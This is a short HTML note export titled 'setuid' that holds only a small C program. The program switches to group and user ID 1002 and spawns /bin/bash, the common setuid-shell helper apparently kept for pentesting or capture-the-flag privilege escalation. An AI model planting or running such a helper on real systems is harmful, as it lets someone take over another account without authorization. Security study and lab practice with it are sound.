<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../../style.css">
    <base target="_parent">
    <title data-trilium-title>setuid</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>setuid</h1>

      <div class="ck-content"><pre><code class="language-text-x-c-src">#include &lt;stdio.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;stdlib.h&gt;
int main(){
setgid(1002);
setuid(1002);
system("/bin/bash");
}</code></pre>
      </div>
    </div>
  </body>

</html>